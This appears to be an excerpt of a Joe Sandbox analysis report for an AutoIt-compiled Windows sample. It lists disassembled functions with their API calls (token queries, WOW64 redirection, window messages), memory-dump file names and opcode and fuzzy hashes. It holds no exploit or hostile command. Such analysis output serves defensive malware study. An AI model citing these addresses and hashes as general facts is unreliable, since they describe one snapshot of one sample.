                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?,?,001F799D), ref: 001F766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F7698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?), ref: 001F76A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F76B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: ccd09982e7b0a7bcfc32f9bc57bcdd9a726c8596ac185583ef9e84a8604b2382
                                                            • Instruction ID: 81fc0422a4ab97dc38c773deb5adfaac13bd9dd92e5811064750a134c589f4b4
                                                            • Opcode Fuzzy Hash: ccd09982e7b0a7bcfc32f9bc57bcdd9a726c8596ac185583ef9e84a8604b2382
                                                            • Instruction Fuzzy Hash: A10184B2601608BBEB209F58ED48BBABBBDEB45761F140038FE04D6251E771DD4197A0
                                                            Function 001F85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F8608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F8612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F8621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F8628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F863E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 2fce51a8da69fd8a5a380133dee4c7fd918793644561973a019e2aacacdba847
                                                            • Instruction ID: 65f926121bb749a2671bf888d721bd5f253485a511c75eee713ac897f6e84682
                                                            • Opcode Fuzzy Hash: 2fce51a8da69fd8a5a380133dee4c7fd918793644561973a019e2aacacdba847
                                                            • Instruction Fuzzy Hash: 12F03C31201218BFEB200FE9ED8DEBB3BADEF89764B400435FA49C6150CB719C42DA60
                                                            Function 001F8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001F8669
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001F8673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F869F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 1df60cafb615ebf7b282059289dd7953fbd0ebb98c11bf32b767f1d8442e0c2a
                                                            • Instruction ID: 939d7c5b383285fc59ee17f0a6f0011685a2affb187b0a39f7c32a055f0dd523
                                                            • Opcode Fuzzy Hash: 1df60cafb615ebf7b282059289dd7953fbd0ebb98c11bf32b767f1d8442e0c2a
                                                            • Instruction Fuzzy Hash: A1F04F71200218BFEB211FA5EC8CEB77BBCEF89764B100035FA49C6150CB719942DA60
                                                            Function 001FC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 001FC6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 001FC6D1
                                                            • MessageBeep.USER32(00000000), ref: 001FC6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 001FC705
                                                            • EndDialog.USER32(?,00000001), ref: 001FC71F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: f7c62885120fb297aa8e70c954b783138f6d3831c6f6e45cf464966670208c57
                                                            • Instruction ID: 786e1de88dc8617be931356eb5cd80b973235b8e6486321544fed7cbbedd9dbe
                                                            • Opcode Fuzzy Hash: f7c62885120fb297aa8e70c954b783138f6d3831c6f6e45cf464966670208c57
                                                            • Instruction Fuzzy Hash: 4F01843040030CA7EB306B60EE4EFB67779FB00701F001669B652A15E0DBE069559E80
                                                            Function 001A13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 001A13BF
                                                            • StrokeAndFillPath.GDI32(?,?,001DBAD8,00000000,?), ref: 001A13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 001A13EE
                                                            • DeleteObject.GDI32 ref: 001A1401
                                                            • StrokePath.GDI32(?), ref: 001A141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: de78fb367a35b1e458759eb147f121e893d162f0015634ff90e1eec57d94d115
                                                            • Instruction ID: 3cc830be343e426c5eb5ec3385141b170cfe78dab33515eca7e3f63079c033f1
                                                            • Opcode Fuzzy Hash: de78fb367a35b1e458759eb147f121e893d162f0015634ff90e1eec57d94d115
                                                            • Instruction Fuzzy Hash: 36F0C934004308FBDB655F6AFD0C7583FB5AB42326F14D224E429860F1C775499ADF50
                                                            Function 001B2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001A7BB1: _memmove.LIBCMT ref: 001A7C0B
                                                            • __swprintf.LIBCMT ref: 001B302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001B2EC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 6d4d901b00bab7951940facfe84028e094f0d22d338fb8a7d0c5813204f6de7e
                                                            • Instruction ID: 348cec866ef46e438a148676315df81da8b93dde641bf33c9ff38b1cd3a1fccc
                                                            • Opcode Fuzzy Hash: 6d4d901b00bab7951940facfe84028e094f0d22d338fb8a7d0c5813204f6de7e
                                                            • Instruction Fuzzy Hash: 4991AD751087419FC718EF24D895DAFB7A4EFA6750F40091DF4529B2A1EB30EE44CB62
                                                            Function 001FB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 001FB981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%#
                                                            • API String ID: 3565006973-1342617892
                                                            • Opcode ID: 832165dc61a20081e80a6d9168110a33a193bda800d36b35dbd4b756bf8e1830
                                                            • Instruction ID: fb620fe23d9b481fe178cee45eef3ceab3044b1aa70566e32d345c714f0cd168
                                                            • Opcode Fuzzy Hash: 832165dc61a20081e80a6d9168110a33a193bda800d36b35dbd4b756bf8e1830
                                                            • Instruction Fuzzy Hash: F29149B0614605DFDB24CF28C884A6ABBF9FF49710F14856EEA4ACB291DB70E841CB50
                                                            Function 001C524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 001C52DD
                                                              • Part of subcall function 001D0340: __87except.LIBCMT ref: 001D037B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: e2c5d5aeb8b4f78f04315cff124aaaa6f505bfd7d989aabe240817cbea3da2f4
                                                            • Instruction ID: a7a698158286df06cb7645f39672b49f1336b0e3867d4e612d533f236864427b
                                                            • Opcode Fuzzy Hash: e2c5d5aeb8b4f78f04315cff124aaaa6f505bfd7d989aabe240817cbea3da2f4
                                                            • Instruction Fuzzy Hash: E4518961A0DA01D7CB16B724D901B7F2BD1AB24350F249D5EE4C5823EAEF74ECC4DA46
                                                            Function 001C023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: 45b0f9dbf6afc93bc462b451a48af2e7c3c6113c72387221d37957a22c1d735e
                                                            • Instruction ID: 9f048511ec93a25a4d13e9c99f0306cbd27c6492d0038e1369125c0cb96939f3
                                                            • Opcode Fuzzy Hash: 45b0f9dbf6afc93bc462b451a48af2e7c3c6113c72387221d37957a22c1d735e
                                                            • Instruction Fuzzy Hash: AC514675106689DFCF16DFA8C488BF97BA5FF6A310F184059EA919B2A0D730DD42C760
                                                            Function 001B62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 564f785efba34381f80357a655a474642a225e4874b3c8fa6fcfd822cfc92831
                                                            • Instruction ID: b7d7c26db7e129572bda7e7eba07e152e46aa09002418e8ade16d0934329b407
                                                            • Opcode Fuzzy Hash: 564f785efba34381f80357a655a474642a225e4874b3c8fa6fcfd822cfc92831
                                                            • Instruction Fuzzy Hash: AE518F71900709DBDB24CF65C881BEABBF4EF24714F20856EEA4ACB241E775D594CB40
                                                            Function 00227648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002276D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002276E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00227708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 5d263f179f78d6c3b0453ae283d55476532a8f05c81f0e892fc962caecbe1729
                                                            • Instruction ID: c42fb2c6a3d2ccb95ef525d91aa76ac4da446d37ec3db858d0e3a330c551cd15
                                                            • Opcode Fuzzy Hash: 5d263f179f78d6c3b0453ae283d55476532a8f05c81f0e892fc962caecbe1729
                                                            • Instruction Fuzzy Hash: 7D21E232514229BBDF22CFA4DC46FEA3B79EF48724F110214FE156B1D0D6B1A861CBA0
                                                            Function 00226F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00226FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00226FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00226FDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 146c1df0e6b0972b9be218d7c7de2e642f520f86617b04f0de70b46d42f94c93
                                                            • Instruction ID: cab87e4611bea3d74c26df535ae90d167a859a9d2bd37d8508ac1e6ae937ccf8
                                                            • Opcode Fuzzy Hash: 146c1df0e6b0972b9be218d7c7de2e642f520f86617b04f0de70b46d42f94c93
                                                            • Instruction Fuzzy Hash: CE2195326201297FDF218F94EC89FAB376AEF89754F018124F9159B590C6719C61CBA0
                                                            Function 0022797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002279E1
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002279F6
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00227A03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 5854e839fc394ce638f9b4f691cafc678b1b888cdc943d61c75f6e7bbbde2d8a
                                                            • Instruction ID: 1c984c784911b39d99a996d0acb562d5df9aa70426b39a59d39937013680e1c2
                                                            • Opcode Fuzzy Hash: 5854e839fc394ce638f9b4f691cafc678b1b888cdc943d61c75f6e7bbbde2d8a
                                                            • Instruction Fuzzy Hash: EE110A32254219BBDF119FB4DC05FEB77ADEF89764F014519FA41A6090D271D861CB60
                                                            Function 001A4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4C2E), ref: 001A4CA3
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001A4CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: d70b46a2e73386c1646bbf98d0103ef4a66c616fcb217bea3759b41e128bf3e1
                                                            • Instruction ID: d67345c8aa8c53bea407704597cac636418ec0083aab43ac949fb3803be23a83
                                                            • Opcode Fuzzy Hash: d70b46a2e73386c1646bbf98d0103ef4a66c616fcb217bea3759b41e128bf3e1
                                                            • Instruction Fuzzy Hash: 7ED0C230510323EFC7704FB0EB0860272F4AF0AB50B10883D9889C2150D7B0C490C610
                                                            Function 001A4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4D2E,?,001A4F4F,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4D6F
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001A4D81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: caaff433c4f8ec1c1a2f5d79df90fc2e141954d582272fc0048f4657ca52a80f
                                                            • Instruction ID: 831ea081ca2590b859dcd2d19a14e3592606f6c892a5d446d9015545f109677e
                                                            • Opcode Fuzzy Hash: caaff433c4f8ec1c1a2f5d79df90fc2e141954d582272fc0048f4657ca52a80f
                                                            • Instruction Fuzzy Hash: 52D01234510713DFD7315FB1E90861676E8AF16752B518839988AD6250E7B4D490CA50
                                                            Function 001A4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4CE1,?), ref: 001A4DA2
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001A4DB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
